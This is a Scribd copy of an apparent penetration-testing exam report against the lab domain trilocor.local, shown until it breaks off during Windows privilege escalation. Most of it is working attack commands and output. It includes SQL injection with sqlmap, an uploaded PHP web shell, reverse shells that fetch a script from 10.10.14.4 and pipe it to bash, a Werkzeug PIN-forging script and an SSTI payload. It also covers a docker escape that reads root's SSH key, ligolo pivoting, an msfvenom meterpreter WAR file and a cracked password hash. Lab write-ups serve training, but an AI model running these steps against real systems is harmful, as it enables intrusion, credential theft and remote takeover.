KEMBAR78
CPTS Report Nov 2024 | PDF | Computing | System Software
Scribd
Upload
4K views55 pages

CPTS Report Nov 2024

The document details a series of penetration testing steps conducted on a target server, including port scanning, subdomain enumeration, and exploiting vulnerabilities to gain access. Tools like Nmap, ffuf, feroxbuster, and sqlmap are utilized to identify open ports, discover subdomains, and perform SQL injection attacks. The process culminates in obtaining a reverse shell and escalating privileges through various exploits, leading to the discovery of sensitive information and access to the system.

Uploaded by

arthurcortesrezende
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
4K views55 pages

CPTS Report Nov 2024

The document details a series of penetration testing steps conducted on a target server, including port scanning, subdomain enumeration, and exploiting vulnerabilities to gain access. Tools like Nmap, ffuf, feroxbuster, and sqlmap are utilized to identify open ports, discover subdomains, and perform SQL injection attacks. The process culminates in obtaining a reverse shell and escalating privileges through various exploits, leading to the discovery of sensitive information and access to the system.

Uploaded by

arthurcortesrezende
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 55

WEB-NIX01

kali@kali:~$ sudo nmap -p- --min-rate 1000 -T4 10.129.xxx.xxx


Nmap scan report for trilocor.local (10.129.xxx.xxx)
Host is up (0.14s latency).

s
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE

m
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp

xa
53/tcp open domain
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind

re
143/tcp open imap
993/tcp open imaps
995/tcp open pop3s
7777/tcp open cbt

be
Nmap done: 1 IP address (1 host up) scanned in 67.52 seconds

kali@kali:~$ echo "10.129.xxx.xxx trilocor.local" | sudo tee -a /etc/hosts


cy
10.129.xxx.xxx trilocor.local
e/
.m
//t
s:

trilocor.local
tp

kali@kali:~$ ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-


top1million-20000.txt:FUZZ -u http://trilocor.local/ -H "Host:
FUZZ.trilocor.local" -fl 4662
ht

/'___\ /'___\ /'___\


/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

s
:: Method : GET
:: URL : http://trilocor.local/

m
:: Wordlist : FUZZ: /opt/useful/SecLists/Discovery/DNS/subdomains-
top1million-20000.txt
:: Header : Host: FUZZ.trilocor.local

xa
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40

re
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response lines: 4662
________________________________________________

be
portal [Status: 200, Size: 2423, Words: 873, Lines: 59,
Duration: 144ms]
remote [Status: 200, Size: 1578, Words: 414, Lines: 35,
Duration: 142ms]
cy
store [Status: 200, Size: 13057, Words: 5397, Lines: 301,
Duration: 158ms]
dev [Status: 200, Size: 10918, Words: 3499, Lines: 376,
Duration: 4010ms]
e/

blog [Status: 200, Size: 7489, Words: 233, Lines: 166,


Duration: 5064ms]
careers [Status: 200, Size: 3661, Words: 1025, Lines: 82,
.m

Duration: 158ms]
pr [Status: 200, Size: 21033, Words: 11361, Lines: 300,
Duration: 153ms]
:: Progress: [19966/19966] :: Job [1/1] :: 14 req/sec :: Duration: [0:03:58]
:: Errors: 0 ::
//t

kali@kali:~$ echo "10.129.xxx.xxx portal.trilocor.local remote.trilocor.local


store.trilocor.local dev.trilocor.local blog.trilocor.local
s:

careers.trilocor.local pr.trilocor.local" | sudo tee -a /etc/hosts


tp
ht
s
m
xa
re
dev.trilocor.local

be
kali@kali:~$ feroxbuster --url http://dev.trilocor.local
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
cy
by Ben "epi" Risher � ver: 2.10.4
───────────────────────────┬──────────────────────
� Target Url │ http://dev.trilocor.local
� Threads │ 50
e/

� Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-
medium-directories.txt
� Status Codes │ All Status Codes!
.m

� Timeout (secs) │ 7
� User-Agent │ feroxbuster/2.10.4
� Config File │ /etc/feroxbuster/ferox-config.toml
� Extract Links │ true
//t

� HTTP methods │ [GET]


� Recursion Depth │ 4
───────────────────────────┴──────────────────────
� Press [ENTER] to use the Scan Management Menu™
s:

──────────────────────────────────────────────────
404 GET 9l 31w 280c Auto-filtering found 404-like
response and created new filter; toggle off with --dont-filter
tp

403 GET 9l 28w 283c Auto-filtering found 404-like


response and created new filter; toggle off with --dont-filter
200 GET 15l 74w 6147c
ht

http://dev.trilocor.local/icons/ubuntu-logo.png
200 GET 375l 964w 10918c http://dev.trilocor.local/
200 GET 1l 4w 87c http://dev.trilocor.local/transfer
Visiting http://dev.trilocor.local/transfer, we are redirected to
http://securetransfer-dev.trilocor.local.
kali@kali:~$ echo "10.129.xxx.xxx securetransfer-dev.trilocor.local" | sudo
tee -a /etc/hosts
10.129.xxx.xxx securetransfer-dev.trilocor.local

s
m
xa
re
be
Upon successful registration, users are redirected to http://securetransfer-
dev.trilocor.local/files.php, which appears to be a file management system.
cy
e/
.m
//t
s:
tp

Generating a php reverse shell using revshells.com


ht
s
m
Uploading the shell
The download functionality of the website generates URLs with the following structure:

xa
http://securetransfer-dev.trilocor.local/download.php?file=a44bzyaf-7dc5-
4570-b815-90d647a58a1f

The ?file parameter is vulnerable to Time-Based SQL Injection. Exploiting this

re
vulnerability allows us to extract the real path of the uploaded shell.

be
cy
e/
.m

kali@kali:~$ cat request.txt


GET /download.php?file=* HTTP/1.1
Host: securetransfer-dev.trilocor.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101
//t

Firefox/115.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*
/*;q=0.8
s:

Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
tp

Referer: http://securetransfer-dev.trilocor.local/files.php
Cookie: PHPSESSID=12ersd0u397tqsv8a6ur13ut4q
Upgrade-Insecure-Requests: 1
ht
kali@kali:~$ sqlmap -r request.txt --dbms=mysql --batch --dbs

s
m
xa
re
be
Dumping Databases
kali@kali:~$ sqlmap -r request.txt --dbms=mysql --batch -D securetransfer --
tables
cy
e/
.m

Dumping tables
//t

kali@kali:~$ sqlmap -r request.txt --dbms=mysql --batch -D securetransfer -T


files --columns --dump
s:
tp
ht
s
m
xa
re
be
Dumping columns
cy
e/

Dumping rows of table


kali@kali:~$ curl http://securetransfer-
.m

dev.trilocor.local/storage/2_92f8fd55-5100-4730-b313-ae83e4ea51b3.php
//t
s:
tp
ht
s
m
xa
re
be
cy
e/
.m

Reverse Shell
The reverse shell gives access to a docker container which can be identified by the
presence of .dockerenv file.
//t

Within the apps/ directory, a file named oszip_data.zip was found.


$ mv apps/oszip_data.zip /var/www/html/storage
s:

Downloading the file


tp

kali@kali:~$ wget http://securetransfer-dev.trilocor.local/oszip_data.zip


ht
s
m
oszip_data.zip

xa
re
be
cy
e/
.m

README.md
Adding osticketapp.trilocor.local to /etc/hosts:
//t

kali@kali:~$ echo "10.129.xxx.xxx osticketapp.trilocor.local" | sudo tee -a


/etc/hosts
s:

Password hash of Administrator user was found in config.sql.


kali@kali:~/Desktop/CPTS$ hashcat -m 3200 hash ~/Desktop/rockyou.txt
tp

kali@kali:~/Desktop/CPTS$ hashcat -m 3200 hash ~/Desktop/rockyou.txt --show


$2a$08$UPdUiJSf37r.gC7TUnOLQOY4HTTLms7G.dUAPDTXKpI2QiQKyH88.:administracion
ht
s
m
xa
OSTicket - Welcome Page

re
be
cy
e/
.m
//t

OSTicket - Login Page


Having administrator account, we can proceeded to the agent login page.
s:
tp
ht
s
m
xa
OSTicket - Agent Login

re
be
cy
e/

OSTicket - Open Tickets


Adding gogsusdev01.trilocor.local to /etc/hosts:
.m

kali@kali:~$ echo "10.129.xxx.xxx gogsusdev01.trilocor.local" | sudo tee -a


/etc/hosts
//t
s:
tp
ht

gogsusdev01.trilocor.local
After registering we are redirected to home page!

s
m
xa
re
Gogs - Home Page

be
cy
Gogs - Public Repos
e/

This repository contained the documentation for API running at uat01-


eu.intranet.trilocor.local.
.m

Adding uat01-eu.intranet.trilocor.local to /etc/hosts:


kali@kali:~$ echo "10.129.xxx.xxx uat01-eu.intranet.trilocor.local" | sudo
tee -a /etc/hosts
//t

By understanding the API through its documentation, we can exploit it to gain shell
access.
s:

kali@kali:~$ curl -s -X POST 'http://uat01-


eu.intranet.trilocor.local/auth/register' -d '{"username":"hacker",
"password":"P4ssword!", "email":"hacker@htb.com"}' -H 'Content-Type:
tp

application/json'
{"message":"Registration Successful."}
ht

kali@kali:~$ curl -s -X POST 'http://uat01-


eu.intranet.trilocor.local/auth/login' -d '{"username":"hacker",
"password":"P4ssword!"}' -H 'Content-Type: application/json'
{"message":"Authentication
Successful.","id":2,"username":"hacker","email":"hacker@htb.com","role":"publ
ic","token":"PHPSESSID=vo1sev7hr4p7rinpta7qpeh8el"}
kali@kali:~$ curl -s -X POST 'http://uat01-
eu.intranet.trilocor.local/auth/update' -d '{"role":"admin"}' -b
"PHPSESSID=vo1sev7hr4p7rinpta7qpeh8el" -H 'Content-Type: application/json'
{"message":"User details successfully updated. Please re-login to activate
the changes."}

s
kali@kali:~$ curl -s -X POST 'http://uat01-
eu.intranet.trilocor.local/auth/login' -d '{"username":"hacker",

m
"password":"P4ssword!"}' -H 'Content-Type: application/json'
{"message":"Authentication
Successful.","id":2,"username":"hacker","email":"hacker@htb.com","role":"admi

xa
n","token":"PHPSESSID=d40ji5im7r9akhg22bvtnp1nej"}

kali@kali:~$ curl -s -X POST 'http://uat01-


eu.intranet.trilocor.local/support/add' -d '{"ticket":"<?php

re
system($_GET['cmd']);?>"}' -b "PHPSESSID=d40ji5im7r9akhg22bvtnp1nej" -H
'Content-Type: application/json'
{"status":"success","message":"Support ticket submitted successfully."}

be
kali@kali:~$ curl -s -X POST 'http://uat01-
eu.intranet.trilocor.local/support/export/1' -d '{"type":"json.php"}' -b
"PHPSESSID=d40ji5im7r9akhg22bvtnp1nej" | jq -r '.url'
http://uat01-
cy
eu.intranet.trilocor.local/exports/tickets_2_20240713205305_92507f97_8f18_48a
5_8f52_29748855de6b.json.php

Create a Reverse Shell Script


e/

On your Kali machine, create a simple reverse shell script and serve it using Python’s
HTTP server:
kali@kali:~$ echo "sh -i >& /dev/tcp/10.10.14.4/1234 0>&1" > shell
.m

kali@kali:~$ python3 -m http.server 80

This will make the shell file accessible over HTTP on port 80.
//t

Start a Netcat Listener


Prepare a listener to catch the reverse shell:
kali@kali:~$ nc -nvlp 1234
s:

Trigger the Shell on the Target


Use the vulnerable endpoint to download and execute the shell script on the target
tp

system:
kali@kali:~$ curl "http://uat01-
eu.intranet.trilocor.local/exports/tickets_2_20240713205305_92507f97_8f18_48a
ht

5_8f52_29748855de6b.json.php?cmd=curl%20http%3A%2F%2F10.10.14.4%2Fshell%20%7C
%20bash"
Verify the Connection
Once executed, you should see a connection from the target system, giving you an
interactive shell.
$ dir /home
websvc srvadm

s
$ ps auxww | grep srvadm

m
srvadm 1375 0.0 0.4 34240 26628 ? Ss 17:30 0:00
/usr/bin/python3 /home/srvadm/budget_calculator/server.py
srvadm 1580 0.0 0.3 34820 23760 ? S 17:30 0:00

xa
/usr/bin/python3 /home/srvadm/budget_calculator/server.py
srvadm 1598 0.0 0.4 34240 26696 ? S 17:30 0:00
/usr/bin/python3 /home/srvadm/budget_calculator/server.py
srvadm 1673 0.1 0.4 108956 25332 ? Sl 17:30 0:19

re
/usr/bin/python3 /home/srvadm/budget_calculator/server.py

The /home/srvadm/budget_calculator/server.py is a website used to calculate budget


and is listening on port 7777.

be
cy
e/
.m

kali@kali:~$ ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-


list-lowercase-2.3-medium.txt:FUZZ -u http://trilocor.local:7777/FUZZ -ac |
//t

grep -v '#'

/'___\ /'___\ /'___\


s:

/\ \__/ /\ \__/ __ __ /\ \__/


\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
tp

\ \_\ \ \_\ \ \____/ \ \_\


\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
ht

________________________________________________

:: Method : GET
:: URL : http://trilocor.local:7777/FUZZ
:: Wordlist : FUZZ: /opt/useful/SecLists/Discovery/Web-
Content/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500

s
________________________________________________

m
console [Status: 200, Size: 1563, Words: 330, Lines: 46,
Duration: 153ms]

xa
re
be
cy
Budget Calculator - PIN Protected Werkzeug Console
The Werkzeug Console PIN can be derived by reversing the algorithm used by
e/

Werkzeug to generate it.


Collecting essentional information
.m

websvc@WEB-NIX01:/var/www/html/_intranet/exports$ python3 -c "import uuid;


print(str(uuid.getnode()))"
21108751877517
//t

websvc@WEB-NIX01:/var/www/html/_intranet/exports$ cat /etc/machine-id


49967d13a6e2400c9aa2ce8a2a217dbe

websvc@WEB-NIX01:/var/www/html/_intranet/exports$ cat /proc/1673/cgroup |


s:

head -1 | awk -F'/' '{print $3}'


budget.service
tp

Werkzeug Console PIN Exploit


import hashlib
ht

from itertools import chain

probably_public_bits = [
'srvadm',
'flask.app',
'Flask',
'/usr/local/lib/python3.8/dist-packages/flask/app.py'
]

private_bits = [
'21108751877517',
'49967d13a6e2400c9aa2ce8a2a217dbebudget.service'

s
]

m
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):

xa
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')

re
h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
h.update(b'pinsalt') be
cy
num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
e/

for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
.m

for x in range(0, len(num), group_size))


break
else:
rv = num
//t

print(rv)

kali@kali:~$ python3 exploit.py


s:

141-750-565
tp
ht
s
m
xa
re
Create a Reverse Shell Script
On your Kali machine, create a simple reverse shell script and serve it using Python’s
HTTP server:

be
kali@kali:~$ echo "sh -i >& /dev/tcp/10.10.14.4/1234 0>&1" > shell
kali@kali:~$ python3 -m http.server 80
cy
This will make the shell file accessible over HTTP on port 80.
Start a Netcat Listener
Prepare a listener to catch the reverse shell:
e/

kali@kali:~$ nc -nvlp 1234

Execute the Payload on the Target


.m

Use following SSTI payload to download and execute the shell file:
__import__('os').popen('curl http://10.10.14.4/shell | bash').read();

This curl command downloads the shell script from your Python server (10.10.14.4)
//t

and pipes it to bash for execution.


Verify the Connection
s:

After executing the curl command, switch to your Netcat listener (nc -nvlp 1234) on
Kali Linux. You should see a connection from the target system, providing you with a
shell.
tp
ht
s
m
xa
re
be
cy
e/
.m

$ id
uid=1002(srvadm) gid=1002(srvadm) groups=1002(srvadm),119(docker)
//t

User srvadm is a member of group docker which can be exploited by creating a


privileged container and mounting the host filesystem to read /root/.ssh/id_rsa.
s:

$ docker -H unix:///run/docker.sock ps
CONTAINER ID IMAGE COMMAND CREATED
STATUS PORTS NAMES
tp

c8601dccf970 securetransferprod "/bin/bash /usr/loca…" 32 months ago


Up About an hour 127.0.0.1:8009->80/tcp
securetransferprod
ht

271aa23cdb55 joomla:latest "/entrypoint.sh apac…" 13 months ago


Up About an hour 127.0.0.1:8010->80/tcp joomla
969e7d72c601 tmp_dev "/bin/sh -c 'apachec…" 13 months ago
Up About an hour 127.0.0.1:8007->80/tcp dev
10e0e001c729 tmp_vpn "/bin/sh -c 'apachec…" 13 months ago
Up About an hour 127.0.0.1:8008->80/tcp vpn
d2e4d0187c4c tmp_pr "/bin/sh -c 'apachec…" 03 months ago
Up About an hour 127.0.0.1:8001->80/tcp pr
8dbabee686cc tmp_osticket "sh -c '/usr/sbin/se…" 03 months ago
Up About an hour 127.0.0.1:8005->80/tcp osticket
8c14dfacb96d gogs/gogs:latest "/app/gogs/docker/st…" 03 months ago

s
Up About an hour (healthy) 22/tcp, 127.0.0.1:8006->3000/tcp gogs
d83970ae0de2 tmp_hr "/bin/sh -c 'apachec…" 03 months ago

m
Up About an hour 127.0.0.1:8003->80/tcp hr
04b86ab0ee13 tmp_jobs "httpd -DFOREGROUND" 03 months ago
Up About an hour 127.0.0.1:8002->80/tcp jobs

xa
6dcb61a613da mariadb:latest "docker-entrypoint.s…" 03 months ago
Up About an hour 3306/tcp joomladb
74193b2cce38 tmp_shop "/bin/sh -c 'apachec…" 03 months ago
Up About an hour 127.0.0.1:8004->80/tcp shop

re
$ docker -H unix:///run/docker.sock run --rm -d --privileged -v /:/hostsystem
securetransferprod
82b123332853f532af23cb0b0f50047c6dcb1fc6a2cfab0d7bf2f7bd631cfcfe

be
$ docker -H unix:///run/docker.sock exec -it 82b123332853 /bin/bash
root@82b123332853:/# cd /hostsystem/root/
root@82b123332853:/hostsystem/root# ls -la
cy
total 64
drwx------ 7 root root 4096 Jul 13 17:31 .
drwxr-xr-x 20 root root 4096 Aug 22 2022 ..
lrwxrwxrwx 1 root root 9 Aug 3 2022 .bash_history -> /dev/null
e/

-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc


drwx------ 3 root root 4096 Aug 3 2022 .cache
drwx------ 3 root root 4096 Aug 18 2022 .config
.m

drwxr-xr-x 3 root root 4096 Aug 3 2022 .local


-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw------- 1 root root 39 Aug 8 2022 .python_history
drwx------ 2 root root 4096 Aug 3 2022 .ssh
-rw------- 1 root root 15201 Sep 14 2022 .viminfo
//t

-rw-r--r-- 1 root root 215 Aug 3 2022 .wget-hsts


-rw-r--r-- 1 root root 33 Jul 13 17:31 flag.txt
drwxr-xr-x 3 root root 4096 Oct 6 2021 snap
s:

root@82b123332853:/hostsystem/root/.ssh# ls -la
total 12
tp

drwx------ 2 root root 4096 Aug 3 2022 .


drwx------ 7 root root 4096 Jul 13 17:31 ..
-rw------- 1 root root 1675 Aug 3 2022 id_rsa
ht

-rw-r--r-- 1 root root 400 Aug 3 2022 id_rsa.pub


s
m
xa
re
be
cy
e/
.m

$ ssh -i id_rsa root@10.129.xxx.xxx

Pivoting to 172.16.139.0/24
//t

# Downloading Binaries
$ mkdir ligolo && cd ligolo
$ wget https://github.com/nicocha30/ligolo-
s:

ng/releases/download/v0.6.2/ligolo-ng_agent_0.6.2_linux_amd64.tar.gz
$ wget https://github.com/nicocha30/ligolo-
ng/releases/download/v0.6.2/ligolo-ng_proxy_0.6.2_linux_amd64.tar.gz
tp

$ tar -xvzf ligolo-ng_agent_0.6.2_linux_amd64.tar.gz


$ tar -xvzf ligolo-ng_proxy_0.6.2_linux_amd64.tar.gz
$ rm LICENSE README.md ligolo-ng_agent_0.6.2_linux_amd64.tar.gz ligolo-
ht

ng_proxy_0.6.2_linux_amd64.tar.gz

# Setting up interfaces
$ sudo ip tuntap add user kali mode tun ligolo
$ sudo ip link set ligolo up
# Hosting ligolo agent
kali@kali:~/ligolo$ python3 -m http.server 80

# Starting proxy
kali@kali:~/ligolo$ ./proxy -selfcert

s
m
xa
re
Downloading the Agent Binary on the Target System

be
root@WEB-NIX01:~$ wget http://10.10.14.4/ligolo/agent
root@WEB-NIX01:~$ chmod +x agent
root@WEB-NIX01:~$ ./agent -connect 10.10.14.4:11601 -ignore-cert
WARN[0000] warning, certificate validation disabled
cy
INFO[0000] Connection established addr="10.10.14.4:11601"

Starting the session


In the ligolo-ng proxy interface:
e/

ligolo-ng » session
ligolo-ng » start
.m

Adding a Route for the Pivoted Network


kali@kali:~$ sudo ip route add 172.16.139.0/24 dev ligolo
//t

The following hosts were found to be alive using tools like ping,nmap,fping and arp
s:

172.16.139.35
172.16.139.175
172.16.139.5
tp

MS01
ht

kali@kali:~/172.16.139.35$ sudo nmap -p- -sV -sC -T4 -A 172.16.139.35 -oN


nmap-all-ports-full-scan.out
Nmap scan report for 172.16.139.35
Host is up (0.12s latency).
Not shown: 65511 closed tcp ports (reset)
PORT STATE SERVICE VERSION
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind

s
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind

m
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs

xa
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd

re
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr

be
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
cy
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
e/

2049/tcp open nlockmgr 1-4 (RPC #100021)


3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=MS01.trilocor.local
.m

| Not valid before: 2024-04-12T17:30:38


|_Not valid after: 2025-01-11T17:30:38
|_ssl-date: 2024-07-14T04:27:26+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: trilocor
//t

| NetBIOS_Domain_Name: trilocor
| NetBIOS_Computer_Name: MS01
| DNS_Domain_Name: trilocor.local
s:

| DNS_Computer_Name: MS01.trilocor.local
| DNS_Tree_Name: trilocor.local
| Product_Version: 10.0.17763
tp

|_ System_Time: 2024-04-15T04:27:04+00:00
3700/tcp open giop CORBA naming service
|_giop-info: ERROR: Script execution failed (use -d to debug)
4848/tcp open http Oracle GlassFish application server
ht

3.1.2.2 (Servlet/3.0 JSP/2.2 JSF/2.0 Java/1.7)


|_http-server-header: Oracle GlassFish Server 3.1.2.2
|_http-title: Login
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7676/tcp open java-message-service Java Message Service 4.5.2 Patch 1
8080/tcp open http-proxy Oracle GlassFish Server 3.1.2.2
|_http-server-header: Oracle GlassFish Server 3.1.2.2
| http-methods:
|_ Potentially risky methods: PUT DELETE TRACE

s
|_http-title: GlassFish Server 3.1.2 - Server Running
| fingerprint-strings:

m
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Content-Type: text/html

xa
| Content-Length: 4806
| Date: Sun, 04 Jan 2024 04:24:02 GMT
| Connection: close
| <!--Arbortext, Inc., 1988-2008, v.4002-->

re
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
| <html lang="en">
| <!--
| ALTER OR REMOVE COPYRIGHT NOTICES OR THIS HEADER.

be
| Copyright (c) 2010, 2012 Oracle and/or its affiliates. All rights
reserved.
| subject to License Terms
| <head>
cy
|_ <style type="text/css"> body{margin-top:0} body,td,p,div,span,a,ul,ul
li, ol, ol li, ol li b, dl,h1,h2,h3,h4,h5,h6,li { font-
family:geneva,helvetica,arial,"lucida sans",sans-serif; font-size:10pt } h1
{font-size:18pt} h2 {font-size:14pt} h3 {font-size:12pt} code,kbd,tt,pre {
e/

font-family:monaco,courier,"courier new"; font-size:10pt; } li {padding-


bottom: 8px} p.copy, p.copy a { font-family:geneva,helvetica,arial,"lucida
|_http-open-proxy: Proxy might be redirecting requests
.m

8181/tcp open ssl/intermapper?


|_ssl-date: 2024-07-14T04:27:26+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=MS01.trilocor.local/organizationName=Oracle
Corporation/stateOrProvinceName=California/countryName=US
| Not valid before: 2022-07-26T13:21:24
//t

|_Not valid after: 2032-07-23T13:21:24


8686/tcp open java-rmi Java RMI
| rmi-dumpregistry:
s:

| MS01.trilocor.local/7676/jmxrmi
| javax.management.remote.rmi.RMIServerImpl_Stub
| @127.0.0.1:50971
tp

| extends
| java.rmi.server.RemoteStub
| extends
| java.rmi.server.RemoteObject
ht

| jmxrmi
| javax.management.remote.rmi.RMIServerImpl_Stub
| @127.0.0.1:8686
| extends
| java.rmi.server.RemoteStub
| extends
|_ java.rmi.server.RemoteObject
10000/tcp open http Jetty 9.4.46.v20220331
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.46.v20220331)

s
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

m
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC

xa
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC

re
49669/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC

be
Aggressive OS guesses: Cisco 3500 XL switch (87%), Scientific Atlanta WebSTAR
EPC2203 cable modem (85%), 3Com Baseline Switch 2924-SFP or Cisco ESW-520
cy
switch or Allied Telesis AT-8000 series switch (85%), Allied Telesis AT-
8000S; Dell PowerConnect 2824, 3448, 5316M, or 5324; Linksys SFE2000P,
SRW2024, SRW2048, or SRW224G4; or TP-LINK TL-SL3428 switch (85%), Linksys
SRW2008MP switch (85%), Cisco SG 300-10, Dell PowerConnect 2748, Linksys
e/

SLM2024, SLM2048, or SLM224P, or Netgear FS728TP or GS724TP switch (85%),


Linksys SRW2000-series or Allied Telesyn AT-8000S switch (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
.m

Host script results:


| smb2-security-mode:
| 3:1:1:
//t

|_ Message signing enabled but not required


|_nbstat: NetBIOS name: MS01, NetBIOS user: <unknown>, NetBIOS MAC:
00:50:56:94:ae:b4 (VMware)
s:

| smb2-time:
| date: 2024-07-14T04:27:10
|_ start_date: N/A
tp

TRACEROUTE
HOP RTT ADDRESS
1 118.53 ms 172.16.139.35
ht

OS and Service detection performed. Please report any incorrect results at


https://nmap.org/submit/ .
Nmap done: 3 IP addresses (3 hosts up) scanned in 517.16 seconds
NFS - 2049
kali@kali:~/172.16.139.35$ showmount -e 172.16.139.35
Export list for 172.16.139.35:
/MS01 (everyone)

s
kali@kali:~/172.16.139.35$ sudo mount -t nfs 172.16.139.35:/MS01 ./target-
NFS/ -o nolock

m
kali@kali:~/172.16.139.35/target-NFS$ dir
apps dev docs prod public temp websites

xa
kali@kali:~/172.16.139.35/target-NFS$ ls -al apps/
total 10
drwx------ 2 nobody nogroup 64 Jul 26 2022 .

re
drwx------ 2 nobody nogroup 64 Aug 19 2022 ..
drwx------ 2 nobody nogroup 4096 Jul 26 2022 glassfish [>> Helpful! <<]
drwx------ 2 nobody nogroup 4096 Jul 26 2022 jboss
drwx------ 2 nobody nogroup 64 Jul 26 2022 tomcat

Getting Initial Access

be
The contents of the file apps/glassfish/domains/domain1/config/local-password in
NFS Share /MS01 can be used as a password to log in to the control panel as admin.
cy
e/
.m
//t

http://172.16.139.35:4848/
s:

A malicious .war file generated using msfvenom can be used to get shell by uploading it
as a module/application.
tp

kali@kali:~$ msfvenom -p java/meterpreter/reverse_tcp LHOST=172.16.139.10


LPORT=1234 -f war > glowfish_deploy.war
ht

Payload size: 6216 bytes


Final size of war file: 6216 bytes

A meterpreter listener was setup to catch the reverse shell:


msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload java/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 0.0.0.0
msf6 exploit(multi/handler) > set LPORT 1234
msf6 exploit(multi/handler) > run

s
m
xa
re
be
cy
To catch the reverse shell, the port 1234 on our first victim machine, WEB-NIX01, must be
forwarded to our local port 1234.
e/

[Agent : root@WEB-NIX01] » listener_add --addr 0.0.0.0:1234 --to


127.0.0.1:1234
INFO[4063] Listener 0 created on remote agent!
.m

The malicious .war file generated using msfvenom is uploaded to the GoldFish Server.
//t
s:
tp
ht
s
m
xa
re
be
cy
Noting that it’s using the server name instead of IP address, an entry was added to the
hosts file:
e/

kali@kali:~$ echo "172.16.139.35 ms01" | sudo tee -a /etc/hosts


172.16.139.35 ms01
.m

Upon clicking the first link, a meterpreter session was established:


//t
s:
tp
ht

Privilege Escalation
The shell obtained via Glassfish service on ports 4848 and 8080, the user
svc_glassfish was identified.

s
m
xa
whoami /priv

re
To enable the necessary privileges, the EnableAllTokenPrivs.ps1 PowerShell script is
used.
meterpreter > upload ~/Transferables/Windows/EnableAllTokenPrivs.ps1

be
[*] Uploading : /home/kali/Transferables/Windows/EnableAllTokenPrivs.ps1 ->
EnableAllTokenPrivs.ps1
[*] Uploaded -1.00 B of 3.37 KiB (-0.03%):
/home/kali/Transferables/Windows/EnableAllTokenPrivs.ps1 ->
cy
EnableAllTokenPrivs.ps1
[*] Completed : /home/kali/Transferables/Windows/EnableAllTokenPrivs.ps1 ->
EnableAllTokenPrivs.ps1
e/

